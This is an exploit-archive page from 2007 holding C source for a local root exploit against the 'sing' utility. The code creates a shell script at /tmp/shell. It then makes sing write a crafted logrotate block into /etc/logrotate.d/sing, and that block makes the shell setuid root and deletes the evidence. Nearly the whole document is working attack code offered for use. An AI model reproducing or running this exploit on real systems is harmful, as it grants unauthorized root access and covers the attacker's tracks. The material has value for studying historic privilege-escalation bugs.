Home / os / solaris

sendicmp-append.txt

Posted on 07 December 2007

/* sing file append exploit by bannedit 12/05/2007 The original reporter of this issue included an example session which added an account to the machine. The method for this exploit is slightly different and much more quiet. Although it relies upon logrotate for help. This could easily be modified to work with cron daemons which are not too strict about the cron file format. However, when I tested vixie cron it appears that there are better checks for file format compilance these days. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define SING_PATH "/usr/bin/sing" char *file = "/etc/logrotate.d/sing"; char *evilname = " /tmp/sing { daily size=0 firstaction chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing* endscript } "; int main() { FILE *fp; int pid; puts("sing file append exploit"); puts("------------------------"); puts("by bannedit"); if(fp = fopen("/tmp/shell", "w+")) { fputs("#!/bin/bash ", fp); fputs("/bin/bash -p", fp); fclose(fp); system("touch /tmp/sing; echo garbage >> /tmp/sing"); } else { puts("error making shell file"); exit(-1); } sleep(5); printf("done sleeping... "); execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0); return 0; }

 

TOP